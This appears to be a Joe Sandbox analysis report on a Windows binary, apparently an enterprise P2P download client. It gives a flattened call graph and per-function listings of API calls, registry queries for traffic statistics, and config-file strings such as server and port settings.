1b58b3 83113->83114 83115 1b58a7 SetLastError 83113->83115 83117 179677 4 API calls 83114->83117 83116 1b58e0 83115->83116 83116->83109 83116->83110 83118 1b58c2 CreateDialogParamW 83117->83118 83118->83116 83119 5f4d8aac 83120 5f4d8abe 83119->83120 83121 5f4d8ab9 83119->83121 83124 5f4d8ace 83120->83124 83125 5f4d867b __EH_prolog3_catch 83120->83125 83131 5f541fb5 __EH_prolog3 __CxxThrowException 83121->83131 83126 5f4d8697 83125->83126 83132 5f4d7cde 83126->83132 83130 5f4d8722 83130->83124 83133 5f4d7cf6 83132->83133 83134 5f4d7ceb 83132->83134 83133->83134 83135 5f4d7d02 83133->83135 83136 5f528425 9 API calls 83134->83136 83141 5f527dec 7 API calls _malloc 83135->83141 83138 5f4d7cf3 83136->83138 83138->83130 83140 5f4d7627 _memcpy_s 83138->83140 83139 5f4d7d12 __CxxThrowException 83140->83130 83141->83139 83142 5f543030 83143 5f543054 83142->83143 83149 5f543186 83142->83149 83144 5f54305d _memset SHGetValueA 83143->83144 83143->83149 83145 5f5430b3 83144->83145 83144->83149 83146 5f543140 _memset 83145->83146 83145->83149 83147 5f542230 83146->83147 83148 5f54316c lstrcmpiA 83147->83148 83148->83149 83150 1b88fc 83153 1b8847 83150->83153 83154 1b8859 83153->83154 83167 1b8887 83153->83167 83155 1b888c 83154->83155 83156 1b8865 83154->83156 83157 1b88b0 83155->83157 83158 1b8895 83155->83158 83193 1b82c9 103 API calls 3 library calls 83156->83193 83159 1b88ca 83157->83159 83160 1b88c3 83157->83160 83164 1b8879 83157->83164 83169 1b878e 83158->83169 83159->83164 83165 1b88d4 83159->83165 83194 1b84c1 95 API calls 4 library calls 83160->83194 83164->83167 83196 1b826c 26 API calls 83164->83196 83195 1b74f8 14 API calls 83165->83195 83170 1b879e 83169->83170 83171 1b87ab 83170->83171 83172 1b87c2 83170->83172 83173 17b9b4 86 API calls 83171->83173 83174 1b87d0 83172->83174 83176 17b9b4 86 API calls 83172->83176 83175 1b87b2 83173->83175 83225 1b7a3b 43 API calls 83174->83225 83224 1b8664 167 API calls 3 library calls 83175->83224 83176->83174 83178 1b87de 83197 1b8541 83178->83197 83183 1b87c0 83183->83174 83193->83164 83194->83167 83195->83167 83196->83167 83198 1b854d __EH_prolog3 83197->83198 83199 16bf10 78 API calls 83198->83199 83201 1b856a 83198->83201 83199->83201 83200 1b8582 83202 17b9b4 86 API calls 83200->83202 83201->83200 83204 1b8599 83201->83204 83207 1b8589 83202->83207 83203 1b8612 83208 16ba90 std::_String_base::_Xlen 2 API calls 83203->83208 83204->83203 83205 1b85e9 83204->83205 83206 1b85b0 83204->83206 83236 1b5b90 78 API calls 4 library calls 83205->83236 83226 1b5b90 78 API calls 4 library calls 83206->83226 83235 1b8208 79 API calls 83207->83235 83211 1b861f 83208->83211 83217 16bf10 78 API calls 83211->83217 83212 1b85bb 83214 16bf10 78 API calls 83212->83214 83213 1b85e7 MoveWindow 83213->83203 83218 1b85d0 83214->83218 83223 1b863f std::_Locinfo::_Locinfo ctype 83217->83223 83219 1b8597 83219->83203 83224->83183 83225->83178 83226->83212 83235->83219 83236->83213 83238 1e6979 83239 1e6985 __mtinitlocknum 83238->83239 83240 1e69af 83239->83240 83241 1e6990 83239->83241 83242 1f4e30 __getptd 67 API calls 83240->83242 83314 1e98d1 67 API calls __getptd_noexit 83241->83314 83244 1e69b4 83242->83244 83274 1e5b21 83244->83274 83245 1e6995 83315 1ea5b1 6 API calls 2 library calls 83245->83315 83248 1e69be 83249 1f05db __calloc_crt 67 API calls 83248->83249 83250 1e69d1 83249->83250 83251 1e69a5 __mtinitlocknum _setlocale 83250->83251 83252 1f339f __lock 67 API calls 83250->83252 83253 1e69e7 83252->83253 83289 1e5abd 83253->83289 83275 1e5b2d __mtinitlocknum 83274->83275 83276 1f4e30 __getptd 67 API calls 83275->83276 83277 1e5b32 83276->83277 83278 1e5b60 83277->83278 83279 1e5b44 83277->83279 83280 1f339f __lock 67 API calls 83278->83280 83281 1f4e30 __getptd 67 API calls 83279->83281 83282 1e5b67 83280->83282 83286 1e5b49 83281->83286 83323 1e5ae3 75 API calls 3 library calls 83282->83323 83284 1e5b7a 83324 1e5b8b LeaveCriticalSection _doexit 83284->83324 83288 1e5b57 __mtinitlocknum 83286->83288 83322 1e7051 67 API calls 3 library calls 83286->83322 83288->83248 83290 1e5ac6 83289->83290 83292 1e5adf 83289->83292 83290->83292 83314->83245 83322->83288 83323->83284 83324->83286 83436 1976fe 83443 19770c 83436->83443 83437 197797 83438 196180 13 API calls 83437->83438 83439 1977a2 GetClientRect 83438->83439 83462 1a6576 83439->83462 83441 1977c9 GetDlgItem 83442 196c96 19 API calls 83441->83442 83444 1977e2 83442->83444 83443->83437 83445 197736 SetWindowPos 83443->83445 83446 1b134f 14 API calls 83444->83446 83464 18e185 GetDC 83445->83464 83448 1977f9 GetClientRect SetWindowPos 83446->83448 83463 1a6576 83448->83463 83449 197755 83451 1e5546 std::_Mutex::_Mutex 75 API calls 83449->83451 83453 19776e 83451->83453 83452 197846 GetDlgItem 83454 196c96 19 API calls 83452->83454 83455 197781 83453->83455 83457 197323 4 API calls 83453->83457 83456 19785f 83454->83456 83465 18e1a1 ReleaseDC DeleteDC 83455->83465 83458 1b134f 14 API calls 83456->83458 83457->83455 83460 197876 GetClientRect SetWindowPos 83458->83460 83461 1978b1 std::_Locinfo::_Locinfo 83460->83461 83462->83441 83463->83452 83464->83449 83465->83437 83466 1aecf0 83467 1aecfc __EH_prolog3 83466->83467 83484 1ab33c KillTimer 83467->83484 83469 1aed06 83470 1ca3ab 13 API calls 83469->83470 83471 1aed16 83470->83471 83485 1aec81 83471->83485 83473 1aedbe std::_Locinfo::_Locinfo 83474 1aed2b 83474->83473 83475 1aed83 83474->83475 83494 1abbfe 83474->83494 83498 1ad02f 25 API calls 3 library calls 83475->83498 83478 1aed8c 83479 1aed91 83478->83479 83480 1aeda5 GetParent SendMessageW 83478->83480 83479->83480 83481 1aed9b 83479->83481 83480->83473 83499 1abc46 KillTimer SetTimer 83481->83499 83484->83469 83500 1ab670 83485->83500 83487 1aec8f 83488 1aec9f FindResourceW 83487->83488 83489 1aec96 GetModuleHandleW 83487->83489 83490 1aecde 83488->83490 83491 1aecb4 SizeofResource LoadResource LockResource 83488->83491 83489->83488 83490->83474 83491->83490 83492 1aecd2 83491->83492 83504 1aebda 83492->83504 83496 1abc0c 83494->83496 83495 1abc41 83495->83475 83496->83495 83497 1abc29 SetWindowPos 83496->83497 83497->83495 83498->83478 83501 1ab67d ctype 83500->83501 83502 1ab689 DeleteObject 83501->83502 83503 1ab692 ctype 83501->83503 83502->83503 83503->83487 83505 1aebe6 __EH_prolog3 83504->83505 83516 1ade99 83505->83516 83517 1adea5 __EH_prolog3 83516->83517 83535 1ad1c4 83517->83535 83538 1accb5 83535->83538 83811 5f5236b9 83812 5f5236c1 83811->83812 83815 5f4eb071 gethostbyname 83812->83815 83814 5f5236c6 83816 5f4eb080 83815->83816 83816->83814 83817 5f4df93d 83821 5f4df959 83817->83821 83822 5f4df94c 83817->83822 83819 5f4df9f1 83835 5f4ddb66 12 API calls 83819->83835 83821->83822 83823 5f4df3bd 83821->83823 83824 5f4df3cf 83823->83824 83834 5f4df3ee 83824->83834 83836 5f4dd949 _wcslen 83824->83836 83826 5f4df413 83827 5f4df45f GetTickCount 83826->83827 83826->83834 83828 5f4df48b _wcsncpy 83827->83828 83832 5f4df4e5 83828->83832 83848 5f52b8b9 21 API calls __toupper_l 83828->83848 83830 5f513f7c 13 API calls 83831 5f4df581 83830->83831 83843 5f4dd8d3 _memset 83831->83843 83832->83830 83834->83819 83835->83822 83849 5f53dd60 83836->83849 83838 5f4dd967 83839 5f4dd97b _wcslen 83838->83839 83842 5f4dd96e _wcsncpy 83838->83842 83840 5f4dd991 83839->83840 83840->83842 83855 5f52b701 __getptd_noexit _LocaleUpdate::_LocaleUpdate _LocaleUpdate::_LocaleUpdate ___crtGetStringTypeW __wcstoi64 83840->83855 83842->83826 83844 5f513ce4 2 API calls 83843->83844 83845 5f4dd919 83844->83845 83846 5f4db9b7 403 API calls 83845->83846 83848->83828 83850 5f53ddf0 83849->83850 83851 5f53dd71 83849->83851 83857 5f53dc76 __getptd_noexit _LocaleUpdate::_LocaleUpdate __towlower_l __towlower_l __lseeki64 83850->83857 83854 5f53dd88 83851->83854 83856 5f52dc8c __getptd_noexit 83851->83856 83854->83838 83855->83842 83856->83854 83857->83854 83858 1b316a 83861 1b30a1 83858->83861 83860 1b318e 83862 1b30ad 83861->83862 83864 1b30b3 83861->83864 83862->83864 83865 1b2f2f 83862->83865 83864->83860 83866 1b2f3e __EH_prolog3_GS 83865->83866 83867 197451 BeginPaint 83866->83867 83868 1b2f53 GetClientRect 83867->83868 83869 197323 4 API calls 83868->83869 83870 1b2f7e 83869->83870 83871 1a6537 GetWindowRect 83870->83871 83872 1b2f92 83871->83872 83879 197395 DeleteObject BitBlt SelectObject DeleteDC ctype 83872->83879 83874 1b2fce 83880 19747c EndPaint 83874->83880 83876 1b2fd6 83877 1e550d 5 API calls 83876->83877 83878 1b2fdb 83877->83878 83878->83864 83879->83874 83880->83876 83881 5f51e920 CreateEventW 83882 5f52ac74 403 API calls 83881->83882 83883 5f51e945 83882->83883 83884 5f51e953 WaitForSingleObject CloseHandle 83883->83884 83885 5f51e94f 83883->83885 83884->83885 83886 1b566f 83893 1796d7 83886->83893 83889 1777af 18 API calls 83890 1b569c SetWindowLongW 83889->83890 83899 1a5e24 CallWindowProcW 83890->83899 83891 1b56b7 83894 1796e4 83893->83894 83895 1796e8 EnterCriticalSection 83893->83895 83894->83889 83894->83891 83896 179704 GetCurrentThreadId 83895->83896 83898 17970c 83895->83898 83896->83898 83897 1783c2 LeaveCriticalSection 83897->83894 83898->83897 83899->83891 83900 5f4e4f3b 83901 5f4e4f4d 83900->83901 83902 5f4e4fa7 GetLastError 83901->83902 83903 5f4e4fe0 83901->83903 83932 5f4e4fc3 83902->83932 83904 5f4e5004 83903->83904 83905 5f50bfae 9 API calls 83903->83905 83906 5f4e5059 83904->83906 83907 5f4e5017 83904->83907 83905->83904 83909 5f4e5066 83906->83909 83914 5f4e5143 83906->83914 83908 5f4e5020 GetLastError 83907->83908 83908->83932 83910 5f4e508c 83909->83910 83919 5f4e5074 83909->83919 83942 5f4e16a5 __time64 GetTickCount __getptd __getptd _rand 83910->83942 83912 5f4e5093 83915 5f513f7c 13 API calls 83912->83915 83912->83932 83913 5f4e514b 83913->83919 83923 5f4e5510 83913->83923 83914->83913 83916 5f4e51ef 83914->83916 83914->83919 83914->83923 83917 5f4e50ac 83915->83917 83943 5f4e16a5 __time64 GetTickCount __getptd __getptd _rand 83916->83943 83917->83919 83924 5f4e52e3 83919->83924 83919->83932 83944 5f509c12 12 API calls 83919->83944 83920 5f50998e 14 API calls 83928 5f4e537e 83920->83928 83921 5f4e51f6 83922 5f513f7c 13 API calls 83921->83922 83921->83923 83926 5f4e5213 83922->83926 83927 5f513f7c 13 API calls 83923->83927 83923->83932 83924->83920 83924->83932 83926->83913 83927->83932 83929 5f4e53e2 _memset 83928->83929 83931 5f4e5407 83928->83931 83928->83932 83930 5f513ce4 2 API calls 83929->83930 83930->83931 83934 5f4e543f 83931->83934 83945 5f509bbd __EH_prolog3_GS lstrlenW __EH_prolog3 83931->83945 83936 5f4e5465 83934->83936 83946 5f509b68 __EH_prolog3_GS lstrlenW __EH_prolog3 83934->83946 83937 5f4e549b 83936->83937 83938 5f4e54c1 GetTickCount 83937->83938 83939 5f4e54e9 83938->83939 83940 5f513f7c 13 API calls 83939->83940 83941 5f4e5506 83940->83941 83941->83932 83942->83912 83943->83921 83944->83924 83945->83934 83946->83936 83947 5f50d927 _memset 83948 5f50d975 83947->83948 83956 5f50da06 83948->83956 83957 5f51ff58 setsockopt 83948->83957 83950 5f50d9b1 83958 5f51ff58 setsockopt 83950->83958 83952 5f50d9e7 83959 5f51ff58 setsockopt 83952->83959 83954 5f50d9fa 83960 5f51c72f 83954->83960 83957->83950 83958->83952 83959->83954 83961 5f528425 9 API calls 83960->83961 83962 5f51c739 83961->83962 83963 5f51c76c PostMessageW 83962->83963 83963->83956 83964 5f4f55b1 83965 5f4f55bc 83964->83965 83966 5f513f0c 13 API calls 83965->83966 83967 5f4f55d2 83966->83967 83968 5f4f55e8 CreateEventW 83967->83968 83969 5f4f55f4 83967->83969 83968->83969 83970 5f4f55f8 CreateEventW 83969->83970 83971 5f4f5600 83969->83971 83970->83971 83976 5f4e7a1f 83971->83976 83974 5f517367 17 API calls 83975 5f4f5617 83974->83975 83979 5f4e79b9 RegOpenKeyExA 83976->83979 83980 5f4e7a1a 83979->83980 83981 5f4e79e4 RegQueryValueExA 83979->83981 83980->83974 83982 5f4e7a0b GetLastError 83981->83982 83983 5f4e7a11 RegCloseKey 83981->83983 83982->83983 83983->83980 83984 1a4fe4 83987 1a4c25 83984->83987 83988 1a4c37 83987->83988 83989 1a4c64 83987->83989 83990 1a4c6c 83988->83990 83991 1a4c47 83988->83991 83992 1a4c96 83990->83992 83993 1a4c74 83990->83993 84010 1a358f 83991->84010 83994 1a4cba 83992->83994 83995 1a4c9b 83992->83995 84019 1a460f GetScrollInfo GetScrollRange GetScrollRange GetScrollPos SetScrollPos 83993->84019 83997 1a4cbf 83994->83997 83998 1a4ccc 83994->83998 84020 1a41b0 10 API calls 83995->84020 84021 1a4307 75 API calls 83997->84021 83999 1a4cff 83998->83999 84000 1a4cd4 83998->84000 84002 1a4d08 83999->84002 84003 1a4c53 83999->84003 84022 1a43f9 6 API calls 84000->84022 84023 1a4348 79 API calls 84002->84023 84003->83989 84024 1a83f6 17 API calls 84003->84024 84009 1a4d1b 84009->84003 84011 1a359a 84010->84011 84012 1a35aa GetWindowLongW SetWindowLongW SetFocus 84011->84012 84025 1a30a3 84012->84025 84014 1a35d6 GetCurrentThreadId 84015 197ef3 4 API calls 84014->84015 84016 1a35e7 84015->84016 84017 19749d 75 API calls 84016->84017 84018 1a35fc 84017->84018 84018->84003 84019->84003 84020->84003 84021->84003 84022->84003 84023->84009 84024->83989 84026 1a30af __EH_prolog3 84025->84026 84027 1a30d3 SetWindowPos 84026->84027 84032 1a3140 std::_Locinfo::_Locinfo 84026->84032 84038 18e185 GetDC 84027->84038 84029 1a30f6 84030 1e5546 std::_Mutex::_Mutex 75 API calls 84029->84030 84031 1a3110 84030->84031 84033 1a3123 84031->84033 84034 197323 4 API calls 84031->84034 84032->84014 84039 1a2343 84033->84039 84034->84033 84038->84029 84040 1a2393 84039->84040 84041 1a2357 GetClientRect 84039->84041 84043 18e1a1 ReleaseDC DeleteDC 84040->84043 84044 1ca52b 84041->84044 84043->84032 84045 1ca539 84044->84045 84046 1ca578 84045->84046 84047 1ca549 84045->84047 84051 1ca56b 84045->84051 84046->84051 84051->84040

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 5F4FFE46 Relevance: 66.9, APIs: 20, Strings: 18, Instructions: 440COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 5f4ffe46-5f4ffe5d call 5f4eaf8a 3 5f500250-5f50026e call 5f4f4c30 0->3 4 5f4ffe63-5f4ffe80 call 5f4f4c30 0->4 9 5f500270 3->9 10 5f500273-5f50027c call 5f4eaf8a 3->10 11 5f4ffe8c-5f4ffe93 4->11 12 5f4ffe82 4->12 9->10 19 5f5002b1-5f5002ba 10->19 20 5f50027e-5f500288 call 5f4f4c30 10->20 13 5f4ffe98-5f4ffea1 call 5f4eaf8a 11->13 14 5f4ffe95 11->14 12->11 21 5f500240-5f50024b call 5f4d8514 13->21 22 5f4ffea7-5f4ffeae 13->22 14->13 24 5f5002bc 19->24 25 5f5002bf-5f5002fe call 5f4eaf8a wsprintfW 19->25 28 5f50028d-5f5002ac call 5f4d8fa1 call 5f4d8514 20->28 21->3 26 5f4ffeb3-5f4fff0b call 5f4ffd50 _memset call 5f4fe124 _wcslen 22->26 27 5f4ffeb0 22->27 24->25 37 5f500305-5f50030c 25->37 44 5f4fffc1-5f4fffc8 26->44 45 5f4fff11-5f4fff70 call 5f513f7c _memset call 5f513ce4 call 5f52aed0 26->45 27->26 28->19 40 5f500315 37->40 41 5f50030e-5f500313 37->41 43 5f500317-5f500328 call 5f52b738 40->43 41->40 41->43 54 5f50032a 43->54 55 5f50032d-5f50033e call 5f52b738 43->55 47 5f4fffcd-5f4fffe9 GetPrivateProfileIntW 44->47 48 5f4fffca 44->48 70 5f4fffab-5f4fffb5 inet_addr 45->70 71 5f4fff72-5f4fff82 inet_addr 45->71 51 5f4fffee-5f500045 GetPrivateProfileIntW _memset call 5f4fe124 _wcslen 47->51 52 5f4fffeb 47->52 48->47 62 5f50004b-5f5000ae call 5f513f7c _memset call 5f513ce4 call 5f52aed0 51->62 63 5f5000ff-5f50014a _memset call 5f4fe124 _wcslen 51->63 52->51 54->55 68 5f500340 55->68 69 5f500343-5f500354 call 5f52b738 55->69 102 5f5000b0-5f5000c0 inet_addr 62->102 103 5f5000e9-5f5000f3 inet_addr 62->103 77 5f500150-5f50019d _memset call 5f513ce4 call 5f52aed0 63->77 78 5f5001ee-5f500214 call 5f4fe124 _wcslen 63->78 68->69 87 5f500356 69->87 88 5f500359-5f500368 69->88 70->44 80 5f4fffb7-5f4fffba 70->80 75 5f4fff97-5f4fffa5 call 5f52aed0 71->75 76 5f4fff84-5f4fff95 71->76 75->71 83 5f4fffa7-5f4fffa9 75->83 76->75 76->83 108 5f5001d8-5f5001e2 inet_addr 77->108 109 5f50019f-5f5001af inet_addr 77->109 95 5f500216-5f50022c call 5f513f7c call 5f549fd7 78->95 96 5f50022f-5f50023b call 5f4d8514 78->96 80->44 83->44 83->70 87->88 88->37 89 5f50036a-5f500395 call 5f4eac19 88->89 105 5f500397 89->105 106 5f50039c-5f501376 call 5f4d8514 * 2 call 5f5284d6 89->106 95->96 96->21 110 5f5000c2-5f5000d3 102->110 111 5f5000d5-5f5000e3 call 5f52aed0 102->111 103->63 113 5f5000f5-5f5000f8 103->113 105->106 108->78 120 5f5001e4-5f5001e7 108->120 116 5f5001b1-5f5001c2 109->116 117 5f5001c4-5f5001d2 call 5f52aed0 109->117 110->111 118 5f5000e5-5f5000e7 110->118 111->102 111->118 113->63 116->117 123 5f5001d4-5f5001d6 116->123 117->109 117->123 118->63 118->103 120->78 123->78 123->108
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F4EAF8A: GetFileAttributesW.KERNEL32(000000FF,5F4FFE4F,?,00000001,00000000,00000000,00000000,000000FF,00000001,5F5BC288,00000000), ref: 5F4EAF8E
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4FFED6
                                                                                                                                                                      • _wcslen.LIBCMT ref: 5F4FFF03
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4FFF38
                                                                                                                                                                      • inet_addr.WS2_32(00000000), ref: 5F4FFF76
                                                                                                                                                                      • inet_addr.WS2_32(00000000), ref: 5F4FFFAC
                                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(EntClient,TRPort,00000050,?), ref: 5F4FFFDB
                                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(EntClient,EntNat,000000FF,?), ref: 5F4FFFF7
                                                                                                                                                                      • _memset.LIBCMT ref: 5F500014
                                                                                                                                                                      • _wcslen.LIBCMT ref: 5F50003D
                                                                                                                                                                      • _memset.LIBCMT ref: 5F500076
                                                                                                                                                                      • inet_addr.WS2_32(00000000), ref: 5F5000B4
                                                                                                                                                                      • inet_addr.WS2_32(00000000), ref: 5F5000EA
                                                                                                                                                                      • _memset.LIBCMT ref: 5F500115
                                                                                                                                                                      • _wcslen.LIBCMT ref: 5F500142
                                                                                                                                                                      • _memset.LIBCMT ref: 5F500165
                                                                                                                                                                        • Part of subcall function 5F513CE4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,0000083F,?,00000000,?,5F513E87,?,?,0000083F), ref: 5F513CFD
                                                                                                                                                                      • inet_addr.WS2_32(00000000), ref: 5F5001A3
                                                                                                                                                                      • inet_addr.WS2_32(00000000), ref: 5F5001D9
                                                                                                                                                                      • _wcslen.LIBCMT ref: 5F50020C
                                                                                                                                                                      • __wcslwr.LIBCMT ref: 5F500227
                                                                                                                                                                      • wsprintfW.USER32 ref: 5F5002E0
                                                                                                                                                                        • Part of subcall function 5F4F4C30: __EH_prolog3.LIBCMT ref: 5F4F4C37
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memsetinet_addr$_wcslen$PrivateProfile$AttributesByteCharFileH_prolog3MultiWide__wcslwrwsprintf
                                                                                                                                                                      • String ID: "$EntClient$EntNat$FIVESIZE$P2PHAVESIZE$PdownList$PolicyControl%d$SDServer$SINGLESIZE$STServer$TRPort$TRServer$[CTaskMgr::__update_config] PdownList:%s$[CTaskMgr::__update_config] STServer:%s$[CTaskMgr::__update_config] TRServer:%s$\360EntClient_download.ini$\livep.dat$%W_
                                                                                                                                                                      • API String ID: 1263679763-1697709049
                                                                                                                                                                      • Opcode ID: 8c0d9a9b73e1e640882b4f23f2278e6a9db053b5681d8ac126cd6825cad9eaac
                                                                                                                                                                      • Instruction ID: 42242d2c2961620f3d5c9cc6a60d6dfaf4602da0568fd3451bca0a74e9d2165a
                                                                                                                                                                      • Opcode Fuzzy Hash: 8c0d9a9b73e1e640882b4f23f2278e6a9db053b5681d8ac126cd6825cad9eaac
                                                                                                                                                                      • Instruction Fuzzy Hash: 4AF193B2901349ABDB11EFA4CC54BEE77EDEF40360F44012AF919AB1C1EB74A6558B90
                                                                                                                                                                      Function 5F4FF494 Relevance: 51.2, APIs: 16, Strings: 13, Instructions: 498registrysynchronizationCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 173 5f4ff494-5f4ff4cc __EH_prolog3 GetTickCount 174 5f4ff4ce-5f4ff4dd call 5f516968 173->174 175 5f4ff4e7-5f4ff4ef 173->175 174->175 176 5f4ffa9a-5f4ffabc call 5f5284d6 175->176 177 5f4ff4f5-5f4ff509 175->177 179 5f4ff50e-5f4ff518 177->179 180 5f4ff50b 177->180 183 5f4ff5ce-5f4ff5d6 179->183 184 5f4ff51e-5f4ff525 179->184 180->179 187 5f4ff5dc-5f4ff5e2 183->187 188 5f4ff6a8-5f4ff6e8 call 5f51ca48 * 2 call 5f50ef1e 183->188 184->183 186 5f4ff52b-5f4ff564 call 5f51ca48 * 2 call 5f50ef1e 184->186 186->183 208 5f4ff566-5f4ff57b call 5f4e135f WaitForSingleObject 186->208 187->188 191 5f4ff5e8-5f4ff5f6 call 5f5174a3 187->191 209 5f4ff6ee-5f4ff6f6 188->209 210 5f4ff90b-5f4ff918 188->210 191->188 198 5f4ff5fc-5f4ff614 call 5f516bc4 call 5f517322 191->198 217 5f4ff69c-5f4ff6a3 call 5f517317 198->217 218 5f4ff61a-5f4ff62d call 5f516be8 198->218 226 5f4ff57d-5f4ff585 call 5f51c882 208->226 227 5f4ff587-5f4ff5a9 CloseHandle call 5f51c882 call 5f51d2ab 208->227 211 5f4ff6f7-5f4ff70a call 5f4e135f call 5f4fb868 209->211 213 5f4ff92d-5f4ff93f call 5f516a0c 210->213 214 5f4ff91a-5f4ff91e 210->214 234 5f4ff70f-5f4ff716 211->234 213->176 232 5f4ff945-5f4ff951 call 5f4fddb9 call 5f4f5da0 213->232 214->213 219 5f4ff920-5f4ff92a 214->219 217->188 236 5f4ff62f-5f4ff64f call 5f513f7c 218->236 237 5f4ff692-5f4ff69a call 5f516bd1 218->237 219->213 239 5f4ff5ae-5f4ff5c9 call 5f51ca48 call 5f50ef1e 226->239 227->239 255 5f4ff956-5f4ff964 232->255 241 5f4ff718-5f4ff720 call 5f523d42 234->241 242 5f4ff725-5f4ff74e _memset call 5f4f7a6e 234->242 236->237 254 5f4ff651-5f4ff65c __time64 236->254 237->217 239->208 269 5f4ff5cb 239->269 241->242 258 5f4ff8c9-5f4ff902 call 5f4ddcf2 call 5f51ca48 call 5f50ef1e 242->258 259 5f4ff754-5f4ff760 242->259 260 5f4ff65e-5f4ff666 254->260 261 5f4ff668-5f4ff68f call 5f516cc7 call 5f513f7c 254->261 255->176 256 5f4ff96a-5f4ff983 call 5f5169f6 255->256 274 5f4ff9c8-5f4ff9e0 call 5f516a04 256->274 275 5f4ff985 256->275 258->211 295 5f4ff908 258->295 259->258 264 5f4ff766-5f4ff77a call 5f516dcb 259->264 260->237 260->261 261->237 264->258 282 5f4ff780-5f4ff7a2 RegQueryValueExW 264->282 269->183 274->176 291 5f4ff9e6 274->291 280 5f4ff98b-5f4ff992 275->280 281 5f4ff987-5f4ff989 275->281 280->274 285 5f4ff994-5f4ff9ad call 5f5169f6 call 5f5169f0 280->285 281->274 281->280 286 5f4ff7ac-5f4ff7d0 RegQueryValueExW 282->286 287 5f4ff7a4-5f4ff7a7 282->287 310 5f4ff9af-5f4ff9b1 285->310 311 5f4ff9b3-5f4ff9b6 285->311 288 5f4ff7da-5f4ff7fe RegQueryValueExW 286->288 289 5f4ff7d2-5f4ff7d5 286->289 287->286 293 5f4ff808-5f4ff82c RegQueryValueExW 288->293 294 5f4ff800-5f4ff803 288->294 289->288 296 5f4ff9e8-5f4ff9ea 291->296 297 5f4ff9f0-5f4ff9f7 291->297 299 5f4ff82e-5f4ff831 293->299 300 5f4ff836-5f4ff85a RegQueryValueExW 293->300 294->293 295->210 296->176 296->297 297->176 301 5f4ff9fd-5f4ffa16 call 5f516a04 call 5f5169fe 297->301 299->300 303 5f4ff85c-5f4ff85f 300->303 304 5f4ff864-5f4ff888 RegQueryValueExW 300->304 318 5f4ffa1c-5f4ffa1f 301->318 319 5f4ffa18-5f4ffa1a 301->319 303->304 308 5f4ff88a-5f4ff88d 304->308 309 5f4ff892-5f4ff8b6 RegQueryValueExW 304->309 308->309 313 5f4ff8b8-5f4ff8bb 309->313 314 5f4ff8c0-5f4ff8c3 RegCloseKey 309->314 310->311 311->274 315 5f4ff9b8-5f4ff9c5 call 5f516f3f 311->315 313->314 314->258 315->274 321 5f4ffa44-5f4ffa56 318->321 322 5f4ffa21-5f4ffa41 call 5f516f3f __time64 call 5f516f3f 318->322 319->318 321->176 323 5f4ffa58 321->323 322->321 325 5f4ffa5a-5f4ffa5f 323->325 326 5f4ffa61-5f4ffa7c 323->326 325->176 325->326 329 5f4ffa7e 326->329 330 5f4ffa80-5f4ffa99 __time64 call 5f516968 326->330 329->330 330->176
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 5F4FF4B3
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F4FF4BA
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,?,?), ref: 5F4FF573
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 5F4FF588
                                                                                                                                                                        • Part of subcall function 5F51D2AB: __EH_prolog3.LIBCMT ref: 5F51D2B2
                                                                                                                                                                        • Part of subcall function 5F51D2AB: std::runtime_error::runtime_error.LIBCPMT ref: 5F51D2DB
                                                                                                                                                                        • Part of subcall function 5F51D2AB: __CxxThrowException@8.LIBCMT ref: 5F51D2F0
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4FF730
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(00000000,LastUploadDate,00000000,?,00000000,?,?,?,?), ref: 5F4FF79E
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,LastUploadTime,00000000,?,00000000,?), ref: 5F4FF7CC
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,LastUploadTraffic,00000000,?,00000000,?), ref: 5F4FF7FA
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,LastDownTraffic,00000000,?,00000000,?), ref: 5F4FF828
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,CurUploadTime,00000000,?,00000000,?), ref: 5F4FF856
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,CurUploadTraffic,00000000,?,00000000,?), ref: 5F4FF884
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,CurDownTraffic,00000000,?,00000000,?), ref: 5F4FF8B2
